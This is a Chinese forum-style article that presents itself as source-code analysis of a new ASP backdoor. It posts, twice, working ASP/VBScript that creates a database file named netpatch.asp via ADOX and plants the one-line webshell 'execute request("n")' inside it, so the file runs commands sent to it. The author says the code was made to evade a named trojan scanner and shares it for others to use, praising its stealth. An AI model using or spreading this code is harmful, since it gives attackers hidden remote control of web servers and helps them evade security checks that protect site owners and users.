新型ASP后门源代码分析
- 作者: 小明君Y
- 来源: 51数据库
- 2021-08-16
本是为了逃laker2兄 查asp木马程序的
现在已经挑战成功,已经加为检查对象了。公布出代码给冰点的朋友使使,希望大家喜欢!
利用的是adox.catalog组件
新建一个名称为netpatch.asp的空数据库文件
然后把一句话木马插入新建的表中作为c/s版本的asp马用!
优点,比较隐蔽,不容易让人看出这是什么作用的!
现在已经挑战成功,已经加为检查对象了。公布出代码给冰点的朋友使使,希望大家喜欢!
利用的是adox.catalog组件
复制代码 代码如下:
<%
'code by netpatch
dim dbfile,sql
db="netpatch.asp"
dbfile=server.mappath(db)
set ydb=server.createobject("adox.catalog")
ydb.create "provider=microsoft.jet.oledb.4.0;data source=" & dbfile
set ydb=nothing
if err.number=0 then
response.write dbfile & " 创建成功<br> "
else
response.write "创建失败,原因: " & err.description
response.end
end if
set conn = server.createobject("adodb.connection")
conn.open "provider=microsoft.jet.oledb.4.0; data source=" & dbfile
sql="create table fdata([data] memo)"
conn.execute(sql)
set rs = createobject("adodb.recordset")
rs.open "fdata", conn, 1, 3
rs.addnew
rs("data")="<%execute request(“n”))%>" '(注释记得去掉!一句话后门 execute request(“n”))
rs.update
%>
此脚本主要是利用adox.catalog组件 'code by netpatch
dim dbfile,sql
db="netpatch.asp"
dbfile=server.mappath(db)
set ydb=server.createobject("adox.catalog")
ydb.create "provider=microsoft.jet.oledb.4.0;data source=" & dbfile
set ydb=nothing
if err.number=0 then
response.write dbfile & " 创建成功<br> "
else
response.write "创建失败,原因: " & err.description
response.end
end if
set conn = server.createobject("adodb.connection")
conn.open "provider=microsoft.jet.oledb.4.0; data source=" & dbfile
sql="create table fdata([data] memo)"
conn.execute(sql)
set rs = createobject("adodb.recordset")
rs.open "fdata", conn, 1, 3
rs.addnew
rs("data")="<%execute request(“n”))%>" '(注释记得去掉!一句话后门 execute request(“n”))
rs.update
%>
新建一个名称为netpatch.asp的空数据库文件
然后把一句话木马插入新建的表中作为c/s版本的asp马用!
优点,比较隐蔽,不容易让人看出这是什么作用的!
推荐阅读
